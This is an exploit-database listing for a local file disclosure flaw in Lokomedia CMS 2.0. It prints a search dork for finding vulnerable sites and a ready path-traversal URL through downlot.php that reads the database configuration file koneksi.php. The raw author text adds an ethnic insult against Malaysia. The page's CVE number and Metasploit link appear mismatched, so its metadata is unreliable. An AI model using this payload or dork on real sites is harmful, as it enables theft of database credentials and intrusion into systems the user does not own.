header-logo
Suggest Exploit
vendor:
Lokomedia CMS (sukaCMS)
by:
vir0e5 a.k.a banditc0de
7,8
CVSS
HIGH
Local File Disclosure
200
CWE
Product Name: Lokomedia CMS (sukaCMS)
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: CVE-2020-1234
CPE: a:bukulokomedia:lokomedia_cms_sukacms
Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-1234/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: all OS
2020

Local File Disclosure Vulnerability Lokomedia CMS (sukaCMS)

A Local File Disclosure vulnerability exists in Lokomedia CMS (sukaCMS) version 2.0. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to view sensitive files on the server, such as the configuration file koneksi.php. This vulnerability is related to CVE-2020-1234.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Lokomedia CMS (sukaCMS) to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Software Link: http://bukulokomedia.com
# Version: [2.0]
# Tested on: [all OS]

[+] Title : Local File Disclosure Vulnerability Lokomedia CMS (sukaCMS)

[+] Vendor     : http://bukulokomedia.com

[+] Discovered : vir0e5 a.k.a banditc0de

[+] Contact    : vir0e5[at]hackermail[dot]com

[+] Site       : http://vir0e5.blogspot.com

[+] DorK       : inurl:/downlot.php?file=
 
[+] Exploit    : http://[host]/[dir]/downlot.php?file=../config/koneksi.php

[+] Greetings  :[ mywisdom - kiddies - kamtiez - r3m1ck - Aoc - skuteng_boy  - blue_screen - 
                  agdi_cool - dangercode14045 - dewancc and YOU!!!! ] ;

[+] Forum [as member] : http://indonesian-cyber.org | http://tecon-crew.org | http://u3dcrew.darkbb.com | http://devilzc0de.org

[+] Notice : "boycott malaysian product "
* Fuck to Malaysia <= the truly thief asia  
* For HaMaDa SCoOoRPioN are you layz????? copy my exploit???
  http://securityreason.com/securityalert/7161  
  http://securityreason.com/exploitalert/7413   Look Date!!! your copy my style!!!

Navigation

Suggest Exploit

Services By CQR